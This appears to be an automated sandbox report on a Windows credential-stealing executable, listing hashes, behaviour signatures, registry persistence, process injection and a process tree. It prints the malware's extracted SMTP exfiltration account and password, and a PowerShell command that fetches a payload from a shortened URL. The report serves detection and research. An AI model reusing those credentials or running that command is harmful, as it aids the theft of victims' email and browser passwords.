Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 01:43
Static task
static1
Behavioral task
behavioral1
Sample
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
Resource
win10v2004-20220721-en
General
-
Target
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
-
Size
912KB
-
MD5
598843804e5c6c64eba09b9cd08bfd9d
-
SHA1
213f93a0b4c73e5b8368e375dd0e89b053f9bcf5
-
SHA256
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f
-
SHA512
0538d5c57ed42976b037bcfad36e42fe13b3aa98a57b7dd0b32006b0d589a72c48fc05daba12a11358a42dd86d9ceccca22b38e9bcad9c0a728c72a303e68046
Malware Config
Extracted
Protocol: smtp- Host:
smtp.vivaldi.net - Port:
587 - Username:
[email protected] - Password:
nAMkXP8FUGvSc3wjPCKF
Signatures
-
NirSoft MailPassView 4 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4764-155-0x0000000000000000-mapping.dmp MailPassView behavioral2/memory/4764-156-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/4764-158-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/4764-159-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4332-161-0x0000000000000000-mapping.dmp WebBrowserPassView behavioral2/memory/4332-162-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4332-164-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4332-166-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView -
Nirsoft 8 IoCs
resource yara_rule behavioral2/memory/4764-155-0x0000000000000000-mapping.dmp Nirsoft behavioral2/memory/4764-156-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/4764-158-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/4764-159-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/4332-161-0x0000000000000000-mapping.dmp Nirsoft behavioral2/memory/4332-162-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4332-164-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4332-166-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 3300 powershell.exe 6 3300 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4640 Chrome.exe 1852 Windows Update.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation Chrome.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" Windows Update.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini Chrome.exe File opened for modification C:\Windows\assembly\Desktop.ini Chrome.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 whatismyipaddress.com 10 whatismyipaddress.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1852 set thread context of 4764 1852 Windows Update.exe 83 PID 1852 set thread context of 4332 1852 Windows Update.exe 84 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\assembly Chrome.exe File created C:\Windows\assembly\Desktop.ini Chrome.exe File opened for modification C:\Windows\assembly\Desktop.ini Chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3300 powershell.exe 3300 powershell.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe 1852 Windows Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4640 Chrome.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeDebugPrivilege 1852 Windows Update.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2576 wrote to memory of 4640 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 78 PID 2576 wrote to memory of 4640 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 78 PID 2576 wrote to memory of 4640 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 78 PID 2576 wrote to memory of 1720 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 79 PID 2576 wrote to memory of 1720 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 79 PID 2576 wrote to memory of 1720 2576 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 79 PID 1720 wrote to memory of 3300 1720 WScript.exe 80 PID 1720 wrote to memory of 3300 1720 WScript.exe 80 PID 1720 wrote to memory of 3300 1720 WScript.exe 80 PID 4640 wrote to memory of 1852 4640 Chrome.exe 82 PID 4640 wrote to memory of 1852 4640 Chrome.exe 82 PID 4640 wrote to memory of 1852 4640 Chrome.exe 82 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4764 1852 Windows Update.exe 83 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84 PID 1852 wrote to memory of 4332 1852 Windows Update.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Users\Admin\AppData\Local\Temp\Chrome.exe"C:\Users\Admin\AppData\Local\Temp\Chrome.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Roaming\Windows Update.exe"C:\Users\Admin\AppData\Roaming\Windows Update.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"4⤵
- Accesses Microsoft Outlook accounts
PID:4764
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"4⤵PID:4332
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\s7.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -command "iwr -uri https://2no.co/2Appw5"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
44B
MD59adcd38d352368d85ae6dc22cd2393ec
SHA1608f7f4ddd5547b537b1a3075a12a11ff03bdd82
SHA2562fa2cf15eacef5258245ba5f331cfd8286547cca36babb479e46deb0b9000408
SHA512b3eab8af2d965a158abcf385c4ff386ff170214779ba29976e21f2044f0fc2ee16766e4496cd0ffe21fed789aaad91e0ff27ff0fad16bd51e5b19b1332508d28
-
Filesize
3KB
MD5f94dc819ca773f1e3cb27abbc9e7fa27
SHA19a7700efadc5ea09ab288544ef1e3cd876255086
SHA256a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA51272a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196
-
Filesize
29KB
MD546ea1b5552e77fbc7679f93124754c57
SHA139cbbdba52ccacd8f874c7afac32b712c2e5bff9
SHA25654a60ce0810b7b0d3e2ab1a9f9f51752d7573a694ec7c1c252a907fb3117bca5
SHA512ac9f19f3314ec3f1c71d4e4681de52102d33110ed4f662b3e2c2a4577f66581d3ba43577ad5ff4ba557145afbf97aa4daec825f57bc9cfda4efd335530d6cb70
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed